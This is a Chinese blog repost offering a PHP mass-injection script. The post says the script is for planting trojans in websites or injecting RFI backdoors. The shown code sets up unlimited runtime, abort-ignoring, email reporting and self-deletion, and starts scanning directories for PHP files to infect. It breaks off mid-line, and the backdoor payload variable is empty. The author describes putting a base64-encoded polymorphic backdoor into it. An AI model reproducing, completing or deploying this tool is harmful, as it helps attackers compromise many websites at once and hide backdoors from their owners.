php下批量挂马,PHP批量挂马脚本脚本安全 -电脑资料

这是一个关于PHP恶意脚本的讨论,该脚本用于批量写入档案并可能用作挂马或RFI后门。作者警告了其中的潜在风险,并指出后门代码位于$inj变量中,同时提供了邮件报告功能。脚本包括目录遍历、检查注入、注入脚本等功能,但可能引发安全问题。
摘要由CSDN通过智能技术生成

批量写入档案脚本...

可以拿来挂马

也能拿来当RFI的后门注入

code都写明的,有需要的请自己看

后门写在$inj里面,要做base64 encode的Polymorphic

不希望这个东西被搞破坏的人拿去玩

懂原理的就自个儿收下吧

*******************************************************************

set_time_limit(0);

ignore_user_abort(1);

# PHP Mass Injection Script. by f3v3r ver.228

# |1| Look for PHP in directory.|2| Check injected.

# |3| Inject script. |4|Can email report to you.

$inj ='';

$log_email = 0;//change 1 enable, somehow they can trace you by this way.

$email = 'f3v3r@cc.cc';

$log_report = 1;

$filename = '__log.html';

$delete_me = 1;

echo 'f3v3r injection toolzDefacez aint hack, r00tz r.

';

$dir = opendir('.');

$site=(isset(

*******************************************************************

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值